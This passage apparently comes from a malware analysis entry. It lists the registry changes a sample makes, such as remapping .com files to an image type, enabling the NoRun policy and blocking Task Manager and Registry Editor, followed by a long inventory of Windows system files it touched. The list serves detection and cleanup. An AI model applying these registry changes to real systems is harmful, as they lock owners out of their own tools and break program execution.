Technical Information
- [HKLM\Software\Classes\.com] '' = 'pngfile'
- Windows Task Manager (Taskmgr)
- Registry Editor (RegEdit)
- [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'StartMenuLogOff' = '00000001'
- [HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '0'
- %WINDIR%\syswow64\ac3acm.acm
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnle004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnle003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnle002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky009.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky008.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky007.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky006.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnky002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnkm005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnkm004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnkm003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnkm002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnin004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnin003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnin002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnhp005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx006.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx007.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx008.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx009.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc00b.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc00a.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc007.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc006.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnok002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnod002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnnr004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnnr002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnnr003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnms002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00z.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00y.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00x.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00w.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00v.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00e.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00d.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00c.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00b.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnlx00a.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnrc00c.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnhp004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnhp003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnhp002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr00a.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr009.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr008.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr007.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr006.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnbr002.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2534111~31bf3856ad364e35~amd64~~6.1.1.0.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_for_KB2534111_SP1~31bf3856ad364e35~amd64~~6.1.1.0.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Package_1_for_KB2534111~31bf3856ad364e35~amd64~~6.1.1.0.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\ntprint.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\ntph.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\ntpe.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\ntexe.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\nt5.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Security-SPP-Component-SKU-Enterprise-GVLK-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-ZA-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-US-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-GB-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-CA-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00a.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00b.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00c.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00d.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prngt003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prngt002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnge001.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnfx002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00l.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00g.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00f.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00e.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00d.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00c.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00b.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep005.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep00a.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnep002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00z.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00y.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00x.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00i.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00h.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00g.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00f.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnca00e.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prngt004.cat
- <SYSTEM32>\logfiles\scm\3ed4dc29-6535-4ba6-8fdf-20bc50cb4900
- <SYSTEM32>\logfiles\wudf\wudftrace.etl
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnso002.cat
- <SYSTEM32>\logfiles\scm\ca4b8ff2-a4d2-4d88-a52e-3a5bdaf7f56e
- <SYSTEM32>\logfiles\scm\c016366b-7126-46ca-b36b-592a3d95a60b
- <SYSTEM32>\logfiles\scm\be669c13-8165-4536-96d0-6d6c39292aae
- <SYSTEM32>\logfiles\scm\bdfe0823-197d-4cbe-be17-5ef8dc6071f2
- <SYSTEM32>\logfiles\scm\b1751288-5acd-4b36-acff-e322459aebf5
- <SYSTEM32>\logfiles\scm\b0cbab43-44fc-469b-a4ce-87426761fdce
- <SYSTEM32>\logfiles\scm\ac668097-4d6b-4093-ac14-014c09dbf820
- <SYSTEM32>\logfiles\scm\ac4e5acf-89f7-4220-ba21-81ee183975e2
- <SYSTEM32>\logfiles\scm\a7c73732-9f11-4281-8d19-764d4ec9d94d
- <SYSTEM32>\logfiles\scm\a6af9377-77ce-47ab-ad7d-ec32cad0c82d
- <SYSTEM32>\logfiles\scm\a48cabbf-24c8-4b87-b00f-9261807c3b43
- <SYSTEM32>\logfiles\scm\a35bb7a6-5f0c-4c9f-8450-2b3bed532d51
- <SYSTEM32>\logfiles\scm\a258c8ba-f273-4a29-9223-3d4b504235c0
- <SYSTEM32>\logfiles\scm\a1d60d55-a6b8-401b-bc05-2938e02df2f2
- <SYSTEM32>\logfiles\scm\a0b729d9-5a98-4045-b5e4-c206c964830d
- <SYSTEM32>\logfiles\scm\9979cb83-103a-4105-9e5d-c74b0af6d198
- <SYSTEM32>\logfiles\scm\994c86ad-a929-4b2c-88a0-4e25a107a029
- <SYSTEM32>\logfiles\scm\98013a8b-b66f-4660-9144-e869d4b0b916
- <SYSTEM32>\logfiles\scm\9435f817-fed2-454e-88cd-7f78fda62c48
- <SYSTEM32>\logfiles\scm\87dd7f5b-4b40-4b9a-9438-a855930477f7
- <SYSTEM32>\logfiles\scm\8567ff9a-f89e-4168-9ae9-906241678a52
- <SYSTEM32>\logfiles\scm\81540b9f-b5bf-47eb-9c95-be195bf2c664
- <SYSTEM32>\logfiles\scm\7afcc0ca-7121-422a-ab45-b0e8d599ff08
- <SYSTEM32>\logfiles\scm\cb3d64bf-c0c9-45ff-bfb0-ff1a8f680186
- <SYSTEM32>\logfiles\scm\ce7b5023-2422-4f48-98c4-c2ed0a82c853
- <SYSTEM32>\logfiles\scm\cee64558-e1a7-4d9d-80a7-2001912be5b5
- <SYSTEM32>\logfiles\scm\d0250f3f-6480-484f-b719-42f659ac64d5
- <SYSTEM32>\logfiles\wmi\terminal-services-unified-apis.etl
- <SYSTEM32>\logfiles\wmi\terminal-services-sessionenv.etl
- <SYSTEM32>\logfiles\wmi\terminal-services-rpc-client.etl
- <SYSTEM32>\logfiles\wmi\terminal-services-ip-virtualization.etl
- <SYSTEM32>\logfiles\wmi\terminal-services-core.etl
- <SYSTEM32>\logfiles\scm\scm.evm.4
- <SYSTEM32>\logfiles\scm\scm.evm.3
- <SYSTEM32>\logfiles\scm\scm.evm.2
- <SYSTEM32>\logfiles\scm\scm.evm.1
- <SYSTEM32>\logfiles\scm\scm.evm
- <SYSTEM32>\logfiles\scm\febaf7e1-73e6-44e2-8766-a1b9f15ee6bb
- <SYSTEM32>\logfiles\scm\fb3c354d-297a-4eb2-9b58-090f6361906b
- <SYSTEM32>\logfiles\scm\fdd56c73-f0d5-41b6-b767-6effd7966428
- <SYSTEM32>\logfiles\scm\fae02932-da36-4a99-8483-5e5f12da46da
- <SYSTEM32>\logfiles\scm\fa2bc0a6-8d4b-458a-85c8-2b8c72487513
- <SYSTEM32>\logfiles\scm\ed29c547-fb49-4328-988c-6ef532e08e66
- <SYSTEM32>\logfiles\scm\eb02381f-d652-4b1c-894a-712498c62c51
- <SYSTEM32>\logfiles\scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
- <SYSTEM32>\logfiles\scm\e3163c33-301d-4730-a266-5518c5ed3967
- <SYSTEM32>\logfiles\scm\e22a8667-f75b-4ba9-ba46-067ed4429de8
- <SYSTEM32>\logfiles\scm\e079c31e-a506-4a98-9cc3-88dc16486af1
- <SYSTEM32>\logfiles\scm\dd9f510c-95f4-499a-90c8-bac5bc372ff4
- <SYSTEM32>\logfiles\scm\da41de71-8431-42fb-9db0-eb64a961dead
- <SYSTEM32>\logfiles\scm\d7b6e81d-3cf4-432c-84d2-24213f4316e6
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnsh002.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-LocalPack-AU-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\logfiles\scm\72db7465-bc54-491b-a92a-4637a28c9bbf
- <SYSTEM32>\logfiles\scm\68170569-8b26-4a5b-a327-ace01f480666
- <SYSTEM32>\logfiles\scm\0e776036-0fd4-4b73-81b1-d33e42d09465
- <SYSTEM32>\logfiles\scm\0df6bf01-0d3d-414e-9ee8-f867ae8a63ca
- <SYSTEM32>\logfiles\scm\09f06bfe-a3c8-40e3-846a-6e6f4000c238
- <SYSTEM32>\logfiles\scm\088482fa-65b8-4e17-9abf-1dcd48e8d373
- <SYSTEM32>\logfiles\scm\044a6734-e90e-4f8f-b357-b2dc8ab3b5ec
- <SYSTEM32>\logfiles\ait\aiteventlog.etl.005
- <SYSTEM32>\logfiles\ait\aiteventlog.etl.004
- <SYSTEM32>\logfiles\ait\aiteventlog.etl.003
- <SYSTEM32>\logfiles\ait\aiteventlog.etl.002
- <SYSTEM32>\logfiles\ait\aiteventlog.etl.001
- %WINDIR%\syswow64\en-us\dfshim.dll.mui
- <SYSTEM32>\catroot2\edbres00002.jrs
- <SYSTEM32>\catroot2\edbres00001.jrs
- <SYSTEM32>\catroot2\edb00563.log
- <SYSTEM32>\catroot2\edb.chk
- <SYSTEM32>\catroot2\dberr.txt
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\windows-legacy-whql.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnxx002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnts003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnts002.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnsv004.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnsv003.cat
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnsv002.cat
- <SYSTEM32>\logfiles\scm\0ea27ae9-c89e-4915-a50e-22689d11f757
- <SYSTEM32>\logfiles\scm\14c536b3-d9c4-4d0c-9543-a84e8a4dd41d
- <SYSTEM32>\logfiles\scm\1588a3a7-6e8c-4d36-8e43-e5484fcecb6a
- <SYSTEM32>\logfiles\scm\174730de-0de2-4b29-8596-e53aab11668b
- <SYSTEM32>\logfiles\scm\632fde03-182b-4577-ac98-da357253a6dd
- <SYSTEM32>\logfiles\scm\613612ba-897d-44ce-8dc1-8fc283f9fd51
- <SYSTEM32>\logfiles\scm\5f5a18eb-dc73-4e45-a11c-b59043598412
- <SYSTEM32>\logfiles\scm\5b42dd9c-5a26-4f27-bb95-34603f0997e5
- <SYSTEM32>\logfiles\scm\5a40e926-9e86-4b89-9cfd-b12311724371
- <SYSTEM32>\logfiles\scm\5033eff9-d2bc-41d0-be5c-ffbdf4ae0209
- <SYSTEM32>\logfiles\scm\4c8b01a2-11ff-4c41-848f-508ef4f00cf7
- <SYSTEM32>\logfiles\scm\4baaa31e-fee3-4d10-afa9-2bf0770795d8
- <SYSTEM32>\logfiles\scm\486d715e-6aa2-44cf-bc48-b6990cbb53c6
- <SYSTEM32>\logfiles\scm\47536d45-eeec-4bdc-8183-a4dc1f8da9e4
- <SYSTEM32>\logfiles\scm\473c6571-3f6a-4d37-bf69-6b69cf0e6341
- <SYSTEM32>\catroot\{f750e6c3-38ee-11d1-85e5-00c04fc295ee}\prnsa002.cat
- <SYSTEM32>\logfiles\scm\467b50ab-333d-4446-8e44-03c36d156e6a
- <SYSTEM32>\logfiles\scm\39da18f9-f47b-424c-a519-ef112e2cb278
- <SYSTEM32>\logfiles\scm\3437021b-71b0-42e6-97b6-0e845ad75d5c
- <SYSTEM32>\logfiles\scm\2f57269b-1e09-4e2d-ab1e-b0fdac7d279c
- <SYSTEM32>\logfiles\scm\2ab8fc9a-7ca1-4a2b-b24b-41f69369c2c2
- <SYSTEM32>\logfiles\scm\28011108-68df-4c73-b91b-57427d501bba
- <SYSTEM32>\logfiles\scm\24e77d77-b188-4b6e-a06a-7b564e41513e
- <SYSTEM32>\logfiles\scm\2470470f-2634-478e-b181-571e98a789bb
- <SYSTEM32>\logfiles\scm\23029558-6c9f-41af-ae41-721b1e0b01cf
- <SYSTEM32>\logfiles\scm\1f7b7221-ae8f-44f3-ba82-f7d260f51964
- <SYSTEM32>\logfiles\scm\1c37d1c4-1c40-4ef4-a242-6e599743c21d
- <SYSTEM32>\logfiles\scm\19b5b15c-7a03-4b58-ba3d-8591f7561971
- <SYSTEM32>\logfiles\scm\6738ba6e-ea75-4b6b-b8b8-71f0336dd8ef
- <SYSTEM32>\logfiles\scm\753c47ae-ec5e-44b3-95a9-2c8e553f0e39
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Refresh-LanguagePack-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- %WINDIR%\syswow64\vcomp100.dll
- %WINDIR%\syswow64\mfc110deu.dll
- %WINDIR%\syswow64\mfc110cht.dll
- %WINDIR%\syswow64\mfc110chs.dll
- %WINDIR%\syswow64\mfc110.dll
- %WINDIR%\syswow64\mfc100u.dll
- %WINDIR%\syswow64\mfc100rus.dll
- %WINDIR%\syswow64\mfc100kor.dll
- %WINDIR%\syswow64\mfc100jpn.dll
- %WINDIR%\syswow64\mfc100ita.dll
- %WINDIR%\syswow64\mfc100fra.dll
- %WINDIR%\syswow64\mfc100esn.dll
- %WINDIR%\syswow64\mfc100enu.dll
- %WINDIR%\syswow64\mfc100deu.dll
- %WINDIR%\syswow64\mfc100cht.dll
- %WINDIR%\syswow64\mfc100chs.dll
- %WINDIR%\syswow64\mfc100.dll
- %WINDIR%\syswow64\mapisvc.inf
- %WINDIR%\syswow64\license.rtf
- %WINDIR%\syswow64\lagarith.dll
- %WINDIR%\syswow64\korwbrkr.lex
- %WINDIR%\syswow64\icrav03.rat
- %WINDIR%\syswow64\flashplayercplapp.cpl
- %WINDIR%\syswow64\flashplayerapp.exe
- %WINDIR%\syswow64\mfc110enu.dll
- %WINDIR%\syswow64\mfc110esn.dll
- %WINDIR%\syswow64\mfc110fra.dll
- %WINDIR%\syswow64\mfc110ita.dll
- %WINDIR%\syswow64\mfc140ita.dll
- %WINDIR%\syswow64\mfc140fra.dll
- %WINDIR%\syswow64\mfc140esn.dll
- %WINDIR%\syswow64\mfc140enu.dll
- %WINDIR%\syswow64\mfc140deu.dll
- %WINDIR%\syswow64\mfc140cht.dll
- %WINDIR%\syswow64\mfc140chs.dll
- %WINDIR%\syswow64\mfc140.dll
- %WINDIR%\syswow64\mfc120u.dll
- %WINDIR%\syswow64\mfc120rus.dll
- %WINDIR%\syswow64\mfc120kor.dll
- %WINDIR%\syswow64\mfc120ita.dll
- %WINDIR%\syswow64\mfc120jpn.dll
- %WINDIR%\syswow64\mfc120fra.dll
- %WINDIR%\syswow64\mfc120esn.dll
- %WINDIR%\syswow64\mfc120enu.dll
- %WINDIR%\syswow64\mfc120deu.dll
- %WINDIR%\syswow64\mfc120cht.dll
- %WINDIR%\syswow64\mfc120chs.dll
- %WINDIR%\syswow64\mfc120.dll
- %WINDIR%\syswow64\mfc110u.dll
- %WINDIR%\syswow64\mfc110rus.dll
- %WINDIR%\syswow64\mfc110kor.dll
- %WINDIR%\syswow64\mfc110jpn.dll
- %WINDIR%\syswow64\mfc140jpn.dll
- %WINDIR%\syswow64\ff_vfw.dll
- %WINDIR%\syswow64\dssec.dat
- %WINDIR%\syswow64\d3dx9_43.dll
- %WINDIR%\syswow64\d3dx10_35.dll
- %WINDIR%\syswow64\d3dx10_34.dll
- %WINDIR%\syswow64\d3dx10_33.dll
- %WINDIR%\syswow64\d3dx10.dll
- %WINDIR%\syswow64\d3dcsx_43.dll
- %WINDIR%\syswow64\d3dcsx_42.dll
- %WINDIR%\syswow64\d3dcompiler_43.dll
- %WINDIR%\syswow64\d3dcompiler_42.dll
- %WINDIR%\syswow64\d3dcompiler_41.dll
- %WINDIR%\syswow64\d3dcompiler_40.dll
- %WINDIR%\syswow64\d3dcompiler_39.dll
- %WINDIR%\syswow64\d3dcompiler_38.dll
- %WINDIR%\syswow64\d3dcompiler_37.dll
- %WINDIR%\syswow64\d3dcompiler_36.dll
- %WINDIR%\syswow64\d3dcompiler_35.dll
- %WINDIR%\syswow64\d3dcompiler_34.dll
- %WINDIR%\syswow64\d3dcompiler_33.dll
- %WINDIR%\syswow64\concrt140d.dll
- %WINDIR%\syswow64\concrt140.dll
- %WINDIR%\syswow64\atl71.dll
- %WINDIR%\syswow64\atl110.dll
- %WINDIR%\syswow64\atl100.dll
- %WINDIR%\syswow64\aspnet_counters.dll
- %WINDIR%\syswow64\d3dx10_36.dll
- %WINDIR%\syswow64\d3dx10_37.dll
- %WINDIR%\syswow64\d3dx10_38.dll
- %WINDIR%\syswow64\d3dx10_39.dll
- %WINDIR%\syswow64\d3dx9_41.dll
- %WINDIR%\syswow64\d3dx9_40.dll
- %WINDIR%\syswow64\d3dx9_39.dll
- %WINDIR%\syswow64\d3dx9_38.dll
- %WINDIR%\syswow64\d3dx9_37.dll
- %WINDIR%\syswow64\d3dx9_36.dll
- %WINDIR%\syswow64\d3dx9_35.dll
- %WINDIR%\syswow64\d3dx9_34.dll
- %WINDIR%\syswow64\d3dx9_33.dll
- %WINDIR%\syswow64\d3dx9_32.dll
- %WINDIR%\syswow64\d3dx9_31.dll
- %WINDIR%\syswow64\d3dx9_29.dll
- %WINDIR%\syswow64\d3dx9_30.dll
- %WINDIR%\syswow64\d3dx9_28.dll
- %WINDIR%\syswow64\d3dx9_27.dll
- %WINDIR%\syswow64\d3dx9_26.dll
- %WINDIR%\syswow64\d3dx9_25.dll
- %WINDIR%\syswow64\d3dx9_24.dll
- %WINDIR%\syswow64\d3dx11_43.dll
- %WINDIR%\syswow64\d3dx11_42.dll
- %WINDIR%\syswow64\d3dx10_43.dll
- %WINDIR%\syswow64\d3dx10_42.dll
- %WINDIR%\syswow64\d3dx10_41.dll
- %WINDIR%\syswow64\d3dx10_40.dll
- %WINDIR%\syswow64\d3dx9_42.dll
- %WINDIR%\syswow64\noise.cht
- %WINDIR%\syswow64\xvidcore.dll
- %WINDIR%\syswow64\mfc140u.dll
- %WINDIR%\syswow64\xactengine2_6.dll
- %WINDIR%\syswow64\xactengine2_5.dll
- %WINDIR%\syswow64\xactengine2_4.dll
- %WINDIR%\syswow64\xactengine2_3.dll
- %WINDIR%\syswow64\xactengine2_2.dll
- %WINDIR%\syswow64\xactengine2_10.dll
- %WINDIR%\syswow64\xactengine2_1.dll
- %WINDIR%\syswow64\xactengine2_0.dll
- %WINDIR%\syswow64\x3daudio1_7.dll
- %WINDIR%\syswow64\x3daudio1_6.dll
- %WINDIR%\syswow64\x3daudio1_5.dll
- %WINDIR%\syswow64\x3daudio1_4.dll
- %WINDIR%\syswow64\x3daudio1_3.dll
- %WINDIR%\syswow64\x3daudio1_2.dll
- %WINDIR%\syswow64\x3daudio1_1.dll
- %WINDIR%\syswow64\x3daudio1_0.dll
- %WINDIR%\syswow64\x264vfw.dll
- %WINDIR%\syswow64\vfpodbc.dll
- %WINDIR%\syswow64\vcruntime140d.dll
- %WINDIR%\syswow64\vcruntime140.dll
- %WINDIR%\syswow64\vcomp140.dll
- %WINDIR%\syswow64\vcomp120.dll
- %WINDIR%\syswow64\vcomp110.dll
- %WINDIR%\syswow64\xactengine2_7.dll
- %WINDIR%\syswow64\xactengine2_8.dll
- %WINDIR%\syswow64\xactengine2_9.dll
- %WINDIR%\syswow64\xactengine3_0.dll
- %WINDIR%\syswow64\xinput1_3.dll
- %WINDIR%\syswow64\xinput1_2.dll
- %WINDIR%\syswow64\xinput1_1.dll
- %WINDIR%\syswow64\xaudio2_7.dll
- %WINDIR%\syswow64\xaudio2_6.dll
- %WINDIR%\syswow64\xaudio2_5.dll
- %WINDIR%\syswow64\xaudio2_4.dll
- %WINDIR%\syswow64\xaudio2_3.dll
- %WINDIR%\syswow64\xaudio2_2.dll
- %WINDIR%\syswow64\xaudio2_1.dll
- %WINDIR%\syswow64\xaudio2_0.dll
- %WINDIR%\syswow64\xapofx1_4.dll
- %WINDIR%\syswow64\xapofx1_5.dll
